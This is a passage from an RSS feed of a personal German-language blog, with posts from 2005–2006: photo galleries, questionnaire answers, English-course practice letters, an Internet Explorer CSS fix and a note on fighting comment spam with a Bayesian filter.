  8233. <dt><a href="https://blog.x-way.org/images/dsc01446.jpg"><img src="https://blog.x-way.org/images/dsc01446_thumb.jpg" alt="images/dsc01446_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8234. <dd class="tdlb"></dd>
  8235. <dt><a href="https://blog.x-way.org/images/dsc01447.jpg"><img src="https://blog.x-way.org/images/dsc01447_thumb.jpg" alt="images/dsc01447_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8236. <dd class="tdlb"></dd>
  8237. <dt><a href="https://blog.x-way.org/images/dsc01448.jpg"><img src="https://blog.x-way.org/images/dsc01448_thumb.jpg" alt="images/dsc01448_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8238. <dd class="tdlb"></dd>
  8239. <dt><a href="https://blog.x-way.org/images/dsc01449.jpg"><img src="https://blog.x-way.org/images/dsc01449_thumb.jpg" alt="images/dsc01449_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8240. <dd class="tdlb"></dd>
  8241. <dt><a href="https://blog.x-way.org/images/dsc01450.jpg"><img src="https://blog.x-way.org/images/dsc01450_thumb.jpg" alt="images/dsc01450_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8242. <dd class="tdlb"></dd>
  8243. <dt><a href="https://blog.x-way.org/images/dsc01451.jpg"><img src="https://blog.x-way.org/images/dsc01451_thumb.jpg" alt="images/dsc01451_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8244. <dd class="tdlb"></dd>
  8245. <dt><a href="https://blog.x-way.org/images/dsc01452.jpg"><img src="https://blog.x-way.org/images/dsc01452_thumb.jpg" alt="images/dsc01452_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8246. <dd class="tdlb"></dd>
  8247. <dt><a href="https://blog.x-way.org/images/dsc01453.jpg"><img src="https://blog.x-way.org/images/dsc01453_thumb.jpg" alt="images/dsc01453_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8248. <dd class="tdlb"></dd>
  8249. <dt><a href="https://blog.x-way.org/images/dsc01454.jpg"><img src="https://blog.x-way.org/images/dsc01454_thumb.jpg" alt="images/dsc01454_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8250. <dd class="tdlb"></dd>
  8251. <dt><a href="https://blog.x-way.org/images/dsc01455.jpg"><img src="https://blog.x-way.org/images/dsc01455_thumb.jpg" alt="images/dsc01455_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8252. <dd class="tdlb"></dd>
  8253. <dt><a href="https://blog.x-way.org/images/dsc01456.jpg"><img src="https://blog.x-way.org/images/dsc01456_thumb.jpg" alt="images/dsc01456_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8254. <dd class="tdlb"></dd>
  8255. <dt><a href="https://blog.x-way.org/images/dsc01457.jpg"><img src="https://blog.x-way.org/images/dsc01457_thumb.jpg" alt="images/dsc01457_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8256. <dd class="tdlb"></dd>
  8257. <dt><a href="https://blog.x-way.org/images/dsc01458.jpg"><img src="https://blog.x-way.org/images/dsc01458_thumb.jpg" alt="images/dsc01458_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8258. <dd class="tdlb"></dd>
  8259. <dt><a href="https://blog.x-way.org/images/dsc01459.jpg"><img src="https://blog.x-way.org/images/dsc01459_thumb.jpg" alt="images/dsc01459_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8260. <dd class="tdlb"></dd>
  8261. <dt><a href="https://blog.x-way.org/images/dsc01460.jpg"><img src="https://blog.x-way.org/images/dsc01460_thumb.jpg" alt="images/dsc01460_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8262. <dd class="tdlb"></dd>
  8263. <dt><a href="https://blog.x-way.org/images/dsc01461.jpg"><img src="https://blog.x-way.org/images/dsc01461_thumb.jpg" alt="images/dsc01461_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8264. <dd class="tdlb"></dd>
  8265. <dt><a href="https://blog.x-way.org/images/dsc01463.jpg"><img src="https://blog.x-way.org/images/dsc01463_thumb.jpg" alt="images/dsc01463_thumb.jpg" style="height:75px;width:100px;"></a></dt>
  8266. <dd class="tdlb"></dd>
  8267. </dl>
  8268.  
  8269. ]]></content:encoded>
  8270.  </item>
  8271.  
  8272.  <item>
  8273.    <title>Die fünf unabhängigen Fragen zum Freitag</title>
  8274.    <link>https://blog.x-way.org/Misc/2006/01/06/Die-fuenf-unabhaengigen-Fragen-zum-Freitag.html</link>
  8275.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324082</guid>
  8276.    <dc:creator>Andreas Jaggi</dc:creator>
  8277.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  8278.    <pubDate>Fri, 06 Jan 2006 02:18:34 +0000</pubDate>
  8279.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  8280.    <description><![CDATA[<p>Nachdem ich es letzte Woche verpennt habe, gibt&#8217;s hier nun die beantworteten <a href="https://web.archive.org/web/20060218194436/http://xn--diefreitglichenfnf-stb20c.de/fragen/die-fuenf-unabhaengigen-zum-freitag" title="Die fünf unabhängigen Fragen zum Freitag (archive.org)">Fragen</a> dieser Woche:</p>
  8281.  
  8282. <ol>
  8283. <li>
  8284. <p>
  8285. <q>Schneiden wir mal ein heikles Thema an. Wie vertreibst Du Dir die
  8286. Zeit auf dem Thron? Gibt&#8217;s Toilettenliteratur, die Tageszeitung, Musik?</q>
  8287. </p>
  8288. <p>
  8289. Meistens hängen meine Gedanken bei irgendeiner Arbeit die ich gerade mache und so nutze ich die Zeit um neue Ideen zu sammeln.
  8290. </p>
  8291. </li>
  8292.  
  8293. <li>
  8294. <p>
  8295. <q>Wenn Du jetzt aus dem nächstgelegenen Fenster schaust. Was stört Dich am ehesten?</q>
  8296. </p>
  8297. <p>
  8298. Hm, weil&#8217;s Nacht ist sehe ich nicht sehr viel und von dem was ich sehe stört mich momentan eigentlich nichts.
  8299. </p>
  8300. </li>
  8301.  
  8302. <li>
  8303. <p>
  8304. <q>Jetzt wird&#8217;s intim. Hast Du einen Fernseher im Schlafzimmer? Und warum hast Du dort (k)einen?</q>
  8305. </p>
  8306. <p>
  8307. Ich habe gar keinen Fernseher.
  8308. </p>
  8309. </li>
  8310.  
  8311. <li>
  8312. <p>
  8313. <q>In jedem dritten Weblog kann man über Moleskines lesen. Jene
  8314. neckischen Notizbücher, die es in diverstesten Formen gibt. Wie
  8315. organisierst Du Dich? Machst Du schriftliche Notizen, oder reizt Du den
  8316. naturgegebenen Speicher voll aus. Wie vewaltest Du Deine Telefonnummern
  8317. und Kontakte?</q>
  8318. </p>
  8319. <p>
  8320. Meistens versuche ich alles im Kopf zu behalten, was auch ziemlich gut
  8321. klappt. Telefonnummern sind im Handy gespeichert und E-Mail Adressen im
  8322. Adressbuch vom E-Mail Programm. Postadressen hingegen nirgends, da ich
  8323. sie nie brauche.
  8324. </p>
  8325. </li>
  8326.  
  8327. <li>
  8328. <p>
  8329. <q>Has(s)t Du Stofftiere?</q>
  8330. </p>
  8331. <p>
  8332. Ich habe ein Stofftier und zwar <a href="https://blog.x-way.org/images/stofftier.jpg" title="Mein Stofftier">dieses hier</a>.
  8333. </p>
  8334. </li>
  8335. </ol>
  8336. ]]></description>
  8337.    <content:encoded><![CDATA[<p>Nachdem ich es letzte Woche verpennt habe, gibt&#8217;s hier nun die beantworteten <a href="https://web.archive.org/web/20060218194436/http://xn--diefreitglichenfnf-stb20c.de/fragen/die-fuenf-unabhaengigen-zum-freitag" title="Die fünf unabhängigen Fragen zum Freitag (archive.org)">Fragen</a> dieser Woche:</p>
  8338.  
  8339. <ol>
  8340. <li>
  8341. <p>
  8342. <q>Schneiden wir mal ein heikles Thema an. Wie vertreibst Du Dir die
  8343. Zeit auf dem Thron? Gibt&#8217;s Toilettenliteratur, die Tageszeitung, Musik?</q>
  8344. </p>
  8345. <p>
  8346. Meistens hängen meine Gedanken bei irgendeiner Arbeit die ich gerade mache und so nutze ich die Zeit um neue Ideen zu sammeln.
  8347. </p>
  8348. </li>
  8349.  
  8350. <li>
  8351. <p>
  8352. <q>Wenn Du jetzt aus dem nächstgelegenen Fenster schaust. Was stört Dich am ehesten?</q>
  8353. </p>
  8354. <p>
  8355. Hm, weil&#8217;s Nacht ist sehe ich nicht sehr viel und von dem was ich sehe stört mich momentan eigentlich nichts.
  8356. </p>
  8357. </li>
  8358.  
  8359. <li>
  8360. <p>
  8361. <q>Jetzt wird&#8217;s intim. Hast Du einen Fernseher im Schlafzimmer? Und warum hast Du dort (k)einen?</q>
  8362. </p>
  8363. <p>
  8364. Ich habe gar keinen Fernseher.
  8365. </p>
  8366. </li>
  8367.  
  8368. <li>
  8369. <p>
  8370. <q>In jedem dritten Weblog kann man über Moleskines lesen. Jene
  8371. neckischen Notizbücher, die es in diverstesten Formen gibt. Wie
  8372. organisierst Du Dich? Machst Du schriftliche Notizen, oder reizt Du den
  8373. naturgegebenen Speicher voll aus. Wie vewaltest Du Deine Telefonnummern
  8374. und Kontakte?</q>
  8375. </p>
  8376. <p>
  8377. Meistens versuche ich alles im Kopf zu behalten, was auch ziemlich gut
  8378. klappt. Telefonnummern sind im Handy gespeichert und E-Mail Adressen im
  8379. Adressbuch vom E-Mail Programm. Postadressen hingegen nirgends, da ich
  8380. sie nie brauche.
  8381. </p>
  8382. </li>
  8383.  
  8384. <li>
  8385. <p>
  8386. <q>Has(s)t Du Stofftiere?</q>
  8387. </p>
  8388. <p>
  8389. Ich habe ein Stofftier und zwar <a href="https://blog.x-way.org/images/stofftier.jpg" title="Mein Stofftier">dieses hier</a>.
  8390. </p>
  8391. </li>
  8392. </ol>
  8393. ]]></content:encoded>
  8394.  </item>
  8395.  
  8396.  <item>
  8397.    <title>Fünf weihnachtliche Fragen</title>
  8398.    <link>https://blog.x-way.org/Misc/2005/12/25/Fuenf-weihnachtliche-Fragen.html</link>
  8399.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324081</guid>
  8400.    <dc:creator>Andreas Jaggi</dc:creator>
  8401.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  8402.    <pubDate>Sun, 25 Dec 2005 18:03:01 +0000</pubDate>
  8403.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  8404.    <description><![CDATA[<p>
  8405. <a href="https://kniebes.com" title="deep-resonance.">Markus</a> stellt fünf weihnachtliche Fragen:
  8406. </p>
  8407.  
  8408. <blockquote cite="https://web.archive.org/web/20060222112927/http://xn--diefreitglichenfnf-stb20c.de/fragen/weihnachtliches-zum-auftakt">
  8409. <ol>
  8410. <li>Und? Schon alle Geschenke gekauft? Auch schon verpackt? </li>
  8411.  
  8412. <li>Hand auf&#8217;s Herz. Ist das Geschenkekaufen ein Pflichtprogramm oder gibst Du Dir Mühe was &#8220;passendes&#8221; zu finden? </li>
  8413.  
  8414. <li>Weihnachten
  8415. das Familienfest. Verbringst Du Weihnachten mit der Familie? Aus
  8416. Tradition? Weil man sich sonst nie sieht? Wird&#8217;s Zoff geben? Oder ist
  8417. Dir das alles zu spie&#223;ig?</li>
  8418.  
  8419. <li>Hast Du überhaupt Lust auf
  8420. Weihnachten? Oder versinkst Du lieber in eine Winterdepression oder
  8421. ergibst Du Dich an den ruhigen Tagen Deinem Weltschmerz? </li>
  8422.  
  8423. <li>Urlaub?
  8424. Na, zwischen den Feiertagen Urlaub genommen? Oder bist Du froh, wenn Du
  8425. Dich fern der Familie bei der Knechterei verstecken kannst? </li>
  8426. </ol>
  8427. </blockquote>
  8428.  
  8429. <p>
  8430. Und hier meine Antworten:
  8431. </p>
  8432. <ol>
  8433. <li>Ich habe alle Geschenke schon gekauft, aber nur die für Gestern sind schon verpackt.</li>
  8434.  
  8435. <li>Geschenke versuche ich immer passende zu finden, was sich allerdings nicht immer als leicht herausstellt.</li>
  8436.  
  8437. <li>Weihnachten verbringe ich mit der Familie; aus Tradition und auch weil ich sie in letzter Zeit nicht sehr viel gesehen habe.</li>
  8438.  
  8439. <li>Lust auf Weihnachten? k.A.</li>
  8440.  
  8441. <li>Ich habe zwei Wochen unterrichtsfreie Zeit, habe aber soviel Arbeit mitbekommen, dass ich nicht wirklich ausspannen kann.</li>
  8442. </ol>
  8443.  
  8444. <p>&nbsp;</p>
  8445. ]]></description>
  8446.    <content:encoded><![CDATA[<p>
  8447. <a href="https://kniebes.com" title="deep-resonance.">Markus</a> stellt fünf weihnachtliche Fragen:
  8448. </p>
  8449.  
  8450. <blockquote cite="https://web.archive.org/web/20060222112927/http://xn--diefreitglichenfnf-stb20c.de/fragen/weihnachtliches-zum-auftakt">
  8451. <ol>
  8452. <li>Und? Schon alle Geschenke gekauft? Auch schon verpackt? </li>
  8453.  
  8454. <li>Hand auf&#8217;s Herz. Ist das Geschenkekaufen ein Pflichtprogramm oder gibst Du Dir Mühe was &#8220;passendes&#8221; zu finden? </li>
  8455.  
  8456. <li>Weihnachten
  8457. das Familienfest. Verbringst Du Weihnachten mit der Familie? Aus
  8458. Tradition? Weil man sich sonst nie sieht? Wird&#8217;s Zoff geben? Oder ist
  8459. Dir das alles zu spie&#223;ig?</li>
  8460.  
  8461. <li>Hast Du überhaupt Lust auf
  8462. Weihnachten? Oder versinkst Du lieber in eine Winterdepression oder
  8463. ergibst Du Dich an den ruhigen Tagen Deinem Weltschmerz? </li>
  8464.  
  8465. <li>Urlaub?
  8466. Na, zwischen den Feiertagen Urlaub genommen? Oder bist Du froh, wenn Du
  8467. Dich fern der Familie bei der Knechterei verstecken kannst? </li>
  8468. </ol>
  8469. </blockquote>
  8470.  
  8471. <p>
  8472. Und hier meine Antworten:
  8473. </p>
  8474. <ol>
  8475. <li>Ich habe alle Geschenke schon gekauft, aber nur die für Gestern sind schon verpackt.</li>
  8476.  
  8477. <li>Geschenke versuche ich immer passende zu finden, was sich allerdings nicht immer als leicht herausstellt.</li>
  8478.  
  8479. <li>Weihnachten verbringe ich mit der Familie; aus Tradition und auch weil ich sie in letzter Zeit nicht sehr viel gesehen habe.</li>
  8480.  
  8481. <li>Lust auf Weihnachten? k.A.</li>
  8482.  
  8483. <li>Ich habe zwei Wochen unterrichtsfreie Zeit, habe aber soviel Arbeit mitbekommen, dass ich nicht wirklich ausspannen kann.</li>
  8484. </ol>
  8485.  
  8486. <p>&nbsp;</p>
  8487. ]]></content:encoded>
  8488.  </item>
  8489.  
  8490.  <item>
  8491.    <title>Best Blonde Joke Ever</title>
  8492.    <link>https://blog.x-way.org/Misc/2005/12/24/Best-Blonde-Joke-Ever.html</link>
  8493.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324080</guid>
  8494.    <dc:creator>Andreas Jaggi</dc:creator>
  8495.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  8496.    <pubDate>Sat, 24 Dec 2005 14:45:26 +0000</pubDate>
  8497.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  8498.    <description><![CDATA[<p>There is it, the <a href="http://vowe.net/archives/006666.html" title="vowe dot net :: Best. Blonde. Joke. Ever.">best blonde joke ever</a>.</p>
  8499. ]]></description>
  8500.    <content:encoded><![CDATA[<p>There is it, the <a href="http://vowe.net/archives/006666.html" title="vowe dot net :: Best. Blonde. Joke. Ever.">best blonde joke ever</a>.</p>
  8501. ]]></content:encoded>
  8502.  </item>
  8503.  
  8504.  <item>
  8505.    <title>Schnee</title>
  8506.    <link>https://blog.x-way.org/Misc/2005/12/18/Schnee.html</link>
  8507.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324079</guid>
  8508.    <dc:creator>Andreas Jaggi</dc:creator>
  8509.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  8510.    <pubDate>Sun, 18 Dec 2005 23:46:24 +0000</pubDate>
  8511.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  8512.    <description><![CDATA[<p>
  8513. <a href="https://blog.x-way.org/images/schnee.jpg" title="Klick um das ganze Bild anzuzeigen"><img width="249" height="179" src="https://blog.x-way.org/images/schnee_ausschnitt.jpg" alt="Schnee (Ausschnitt)"></a>
  8514. </p>
  8515.  
  8516. <p>
  8517. Blick aus meinem Fenster, heute um 11:28 Uhr.<br>
  8518. Danach gings ab auf die Piste :-)
  8519. </p>
  8520. ]]></description>
  8521.    <content:encoded><![CDATA[<p>
  8522. <a href="https://blog.x-way.org/images/schnee.jpg" title="Klick um das ganze Bild anzuzeigen"><img width="249" height="179" src="https://blog.x-way.org/images/schnee_ausschnitt.jpg" alt="Schnee (Ausschnitt)"></a>
  8523. </p>
  8524.  
  8525. <p>
  8526. Blick aus meinem Fenster, heute um 11:28 Uhr.<br>
  8527. Danach gings ab auf die Piste :-)
  8528. </p>
  8529. ]]></content:encoded>
  8530.  </item>
  8531.  
  8532.  <item>
  8533.    <title>CSS4IE</title>
  8534.    <link>https://blog.x-way.org/Webdesign/2005/11/23/CSS4IE.html</link>
  8535.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324078</guid>
  8536.    <dc:creator>Andreas Jaggi</dc:creator>
  8537.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  8538.    <pubDate>Wed, 23 Nov 2005 01:21:59 +0000</pubDate>
  8539.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  8540.    <description><![CDATA[<p>Da hier anscheinend doch machmal ein paar Benutzer mit dem Internet
  8541. Explorer vorbeikommen habe ich nun doch noch das Layout so angepasst,
  8542. dass es auch im Internet Explorer wie gewünscht aussieht (zudem soll ja
  8543. eine potentielle Kundschaft nicht abgeschreckt
  8544. werden).</p>
  8545. <p>
  8546. Eigentlich sind die Änderungen am CSS nur ganz klein, aber umso schwerer herauszufinden *grrr*.<br>
  8547. Als sehr hilfreich herausgestellt hat sich die parallele Installation verschiedener Internet Explorer Versionen. <a href="https://web.archive.org/web/20051125045405/http://www.quirksmode.org/browsers/multipleie.html" title="Multiple Explorers (archive.org)">Dieser Artikel</a> erklärt wie man eine solche Testumgebung erstellt.</p>
  8548. <p>
  8549. Interessanterweise sah der unangepasste Stylesheet im Internet Explorer 4 bedeutend besser aus als im Internet Explorer 5, 5.5 oder 6.</p>
  8550. ]]></description>
  8551.    <content:encoded><![CDATA[<p>Da hier anscheinend doch machmal ein paar Benutzer mit dem Internet
  8552. Explorer vorbeikommen habe ich nun doch noch das Layout so angepasst,
  8553. dass es auch im Internet Explorer wie gewünscht aussieht (zudem soll ja
  8554. eine potentielle Kundschaft nicht abgeschreckt
  8555. werden).</p>
  8556. <p>
  8557. Eigentlich sind die Änderungen am CSS nur ganz klein, aber umso schwerer herauszufinden *grrr*.<br>
  8558. Als sehr hilfreich herausgestellt hat sich die parallele Installation verschiedener Internet Explorer Versionen. <a href="https://web.archive.org/web/20051125045405/http://www.quirksmode.org/browsers/multipleie.html" title="Multiple Explorers (archive.org)">Dieser Artikel</a> erklärt wie man eine solche Testumgebung erstellt.</p>
  8559. <p>
  8560. Interessanterweise sah der unangepasste Stylesheet im Internet Explorer 4 bedeutend besser aus als im Internet Explorer 5, 5.5 oder 6.</p>
  8561. ]]></content:encoded>
  8562.  </item>
  8563.  
  8564.  <item>
  8565.    <title>FCE Formal Letter #1</title>
  8566.    <link>https://blog.x-way.org/School/2005/11/22/FCE-Formal-Letter-1.html</link>
  8567.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324077</guid>
  8568.    <dc:creator>Andreas Jaggi</dc:creator>
  8569.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  8570.    <pubDate>Tue, 22 Nov 2005 21:39:44 +0000</pubDate>
  8571.    <category domain="https://blog.x-way.org/School">School</category>
  8572.    <description><![CDATA[<p>Here's the letter we had to write for this week. In fact it's not
  8573. totaly written by myself because about 40% of the letter were already
  8574. given and we just had to complete it.<br>
  8575. Since we had to do this letter for today, it's not yet corrected.</p>
  8576. <br><br>
  8577. <blockquote class="fce-formal-letter">
  8578. <p>Dear Mr Spiller,</p>
  8579.  
  8580. <p>Thank you very much for your letter informing me that I have won
  8581. first prize in the competition. I am looking forward to going to
  8582. Australia and attending the course.</p>
  8583.  
  8584. <p>I would like to do the course in August because in September my courses at the EPFL start.</p>
  8585.  
  8586. <p>In the morning, I would like to join a grammar and vocabulary class
  8587. because I asume my skills in these fields could use an improvement.<br>
  8588. In
  8589. the afternoon, I would like to try making a class website because I was
  8590. always fascinated by the possibilities of the internet and would like
  8591. to create a part of it on my own. I would also be interested in trying
  8592. to make a radio programme because I often listen to the radio and like
  8593. it a lot.</p>
  8594.  
  8595. <p>Could you tell me what type of accommmodation is provided and what kind of clothes I should bring with me?</p>
  8596.  
  8597. <p>I look forward to hearing from you.</p>
  8598.  
  8599. <p>Yours sincerely,</p>
  8600.  
  8601. <p>Andreas Jaggi</p>
  8602. </blockquote>
  8603. ]]></description>
  8604.    <content:encoded><![CDATA[<p>Here's the letter we had to write for this week. In fact it's not
  8605. totaly written by myself because about 40% of the letter were already
  8606. given and we just had to complete it.<br>
  8607. Since we had to do this letter for today, it's not yet corrected.</p>
  8608. <br><br>
  8609. <blockquote class="fce-formal-letter">
  8610. <p>Dear Mr Spiller,</p>
  8611.  
  8612. <p>Thank you very much for your letter informing me that I have won
  8613. first prize in the competition. I am looking forward to going to
  8614. Australia and attending the course.</p>
  8615.  
  8616. <p>I would like to do the course in August because in September my courses at the EPFL start.</p>
  8617.  
  8618. <p>In the morning, I would like to join a grammar and vocabulary class
  8619. because I asume my skills in these fields could use an improvement.<br>
  8620. In
  8621. the afternoon, I would like to try making a class website because I was
  8622. always fascinated by the possibilities of the internet and would like
  8623. to create a part of it on my own. I would also be interested in trying
  8624. to make a radio programme because I often listen to the radio and like
  8625. it a lot.</p>
  8626.  
  8627. <p>Could you tell me what type of accommmodation is provided and what kind of clothes I should bring with me?</p>
  8628.  
  8629. <p>I look forward to hearing from you.</p>
  8630.  
  8631. <p>Yours sincerely,</p>
  8632.  
  8633. <p>Andreas Jaggi</p>
  8634. </blockquote>
  8635. ]]></content:encoded>
  8636.  </item>
  8637.  
  8638.  <item>
  8639.    <title>FCE Informal Letter #2</title>
  8640.    <link>https://blog.x-way.org/School/2005/11/20/FCE-Informal-Letter-2.html</link>
  8641.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324076</guid>
  8642.    <dc:creator>Andreas Jaggi</dc:creator>
  8643.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  8644.    <pubDate>Sun, 20 Nov 2005 01:07:51 +0000</pubDate>
  8645.    <category domain="https://blog.x-way.org/School">School</category>
  8646.    <description><![CDATA[<p>To continue what I started on Friday: here is the second letter I
  8647. wrote for the English course. I got back this letter last Thursday, so
  8648. it comes already with the corrections, but I plan to publish the next
  8649. letters before I hand them in and to add the corrections afterwards.</p>
  8650. <br><br>
  8651. <blockquote class="fce-informal-letter">
  8652. <p class="fce-informal-letter-no-indent">Dear Roman,</p>
  8653. <p>
  8654. You asked me for advice regarding next term. Here is the information I gathered for you.
  8655. </p>
  8656. <p>
  8657. The course registration is on Monday 6 September and Tuesday 7
  8658. September from 10.00 to 16.00. Register as early as possible because
  8659. there are really <del>much</del><ins>many</ins> people. There is always a big queue, but it is worth it.
  8660. </p>
  8661. <p>
  8662. Also on Tuesday but at 9.00 the College bookshop opens. You need all the books by Wednesday.<br>
  8663. At the bookshop they cost <del>50 pounds</del><ins>&#163;50</ins>, but you can have mine for half price<ins>, great bargain!!</ins>.
  8664. </p>
  8665. <p>
  8666. The first lesson starts on Wednesday 8 September at 9.15. It is always good to be there early (9.00) so you have a good seat.
  8667. </p>
  8668. <p>
  8669. On Wednesday evening there is a welcome party at 20.00 at Seven Starts
  8670. Hotel, it is always a great fun. Maybe we will meet there?
  8671. </p>
  8672. <p class="fce-informal-letter-no-indent">See you there</p>
  8673. <p class="fce-informal-letter-no-indent">Yours<br>Andreas</p>
  8674. </blockquote>
  8675. ]]></description>
  8676.    <content:encoded><![CDATA[<p>To continue what I started on Friday: here is the second letter I
  8677. wrote for the English course. I got back this letter last Thursday, so
  8678. it comes already with the corrections, but I plan to publish the next
  8679. letters before I hand them in and to add the corrections afterwards.</p>
  8680. <br><br>
  8681. <blockquote class="fce-informal-letter">
  8682. <p class="fce-informal-letter-no-indent">Dear Roman,</p>
  8683. <p>
  8684. You asked me for advice regarding next term. Here is the information I gathered for you.
  8685. </p>
  8686. <p>
  8687. The course registration is on Monday 6 September and Tuesday 7
  8688. September from 10.00 to 16.00. Register as early as possible because
  8689. there are really <del>much</del><ins>many</ins> people. There is always a big queue, but it is worth it.
  8690. </p>
  8691. <p>
  8692. Also on Tuesday but at 9.00 the College bookshop opens. You need all the books by Wednesday.<br>
  8693. At the bookshop they cost <del>50 pounds</del><ins>&#163;50</ins>, but you can have mine for half price<ins>, great bargain!!</ins>.
  8694. </p>
  8695. <p>
  8696. The first lesson starts on Wednesday 8 September at 9.15. It is always good to be there early (9.00) so you have a good seat.
  8697. </p>
  8698. <p>
  8699. On Wednesday evening there is a welcome party at 20.00 at Seven Starts
  8700. Hotel, it is always a great fun. Maybe we will meet there?
  8701. </p>
  8702. <p class="fce-informal-letter-no-indent">See you there</p>
  8703. <p class="fce-informal-letter-no-indent">Yours<br>Andreas</p>
  8704. </blockquote>
  8705. ]]></content:encoded>
  8706.  </item>
  8707.  
  8708.  <item>
  8709.    <title>Kommentar Spam</title>
  8710.    <link>https://blog.x-way.org/Coding/2005/11/20/Kommentar-Spam.html</link>
  8711.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324075</guid>
  8712.    <dc:creator>Andreas Jaggi</dc:creator>
  8713.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  8714.    <pubDate>Sun, 20 Nov 2005 00:07:22 +0000</pubDate>
  8715.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  8716.    <description><![CDATA[<p>Seit gestern haben hier die Spam-Kommentare massiv zugenommmen
  8717. (sprich 40-50 anstelle von 0-10 pro Tag). Zudem werden sie nicht mehr
  8718. über den ganzen Tag verteilt abgegeben sondern fast alle innerhalb der
  8719. gleichen 5-10 Minuten.</p>
  8720.  
  8721. <p>Glücklicherweise habe ich schon vor einiger Zeit meinen <a href="http://waterwave.ch/weblog/Fight-Spam" title="x-log: Fight Spam">&quot;naiven&quot; Badword-Filter</a> durch einen <a href="http://de.wikipedia.org/wiki/Bayesscher_Filter" title="Bayesscher Filter - Wikipedia">Bayes'schen Spamfilter</a> ersetzt, der bisher alle(!) Spam-Kommentare erkannt und markiert hat.
  8722. <br>
  8723. Aber es ist trotzdem ärgerlich immer die als Spam markierten
  8724. Kommentare zu löschen (momentant habe ich noch nicht genügend Vertrauen
  8725. in den Filter als dass ich ihn die Spam-Kommentare automatisch löschen
  8726. lasse).</p>
  8727.  
  8728. <p>Da die Anzahl der hier vorhandenen Kommentare nicht gerade enorm
  8729. ist, habe ich um den Spamfilter zu trainieren auch noch die Seiten
  8730. meines <a href="http://waterwave.ch/weblog/phiki_waterwave_ch" title="x-log: phiki.waterwave.ch">spamgeplagten</a> <a href="https://phiki.x-way.org/" title="phiki.waterwave.ch">Wikis</a> hinzugenommen. Auch dort funktioniert die Spamerkennung nach anfänglichen Schwierigkeiten (False-positives) problemlos.</p>
  8731.  
  8732. <p>
  8733. Dieses &quot;Wundermittel gegen den Spam&quot; habe ich nicht etwa selber entwickelt sondern ich habe einfach die <a href="http://www.phpclasses.org/spamfilter" title="PHP Classes - Class: Spam Filter">Spam Filter Klasse</a> von <a href="http://www.phpclasses.org/" title="PHP Classes">PHPClasses.org</a> an meine Bedürfnisse angepasst.<br>
  8734. Allen Spamgeplagten kann ich den Einsatz eines <a href="http://de.wikipedia.org/wiki/Bayesscher_Filter" title="Bayesscher Filter - Wikipedia">Bayes'schen Spamfilters</a> sehr empfehlen!
  8735. </p>
  8736. ]]></description>
  8737.    <content:encoded><![CDATA[<p>Seit gestern haben hier die Spam-Kommentare massiv zugenommmen
  8738. (sprich 40-50 anstelle von 0-10 pro Tag). Zudem werden sie nicht mehr
  8739. über den ganzen Tag verteilt abgegeben sondern fast alle innerhalb der
  8740. gleichen 5-10 Minuten.</p>
  8741.  
  8742. <p>Glücklicherweise habe ich schon vor einiger Zeit meinen <a href="http://waterwave.ch/weblog/Fight-Spam" title="x-log: Fight Spam">&quot;naiven&quot; Badword-Filter</a> durch einen <a href="http://de.wikipedia.org/wiki/Bayesscher_Filter" title="Bayesscher Filter - Wikipedia">Bayes'schen Spamfilter</a> ersetzt, der bisher alle(!) Spam-Kommentare erkannt und markiert hat.
  8743. <br>
  8744. Aber es ist trotzdem ärgerlich immer die als Spam markierten
  8745. Kommentare zu löschen (momentant habe ich noch nicht genügend Vertrauen
  8746. in den Filter als dass ich ihn die Spam-Kommentare automatisch löschen
  8747. lasse).</p>
  8748.  
  8749. <p>Da die Anzahl der hier vorhandenen Kommentare nicht gerade enorm
  8750. ist, habe ich um den Spamfilter zu trainieren auch noch die Seiten
  8751. meines <a href="http://waterwave.ch/weblog/phiki_waterwave_ch" title="x-log: phiki.waterwave.ch">spamgeplagten</a> <a href="https://phiki.x-way.org/" title="phiki.waterwave.ch">Wikis</a> hinzugenommen. Auch dort funktioniert die Spamerkennung nach anfänglichen Schwierigkeiten (False-positives) problemlos.</p>
  8752.  
  8753. <p>
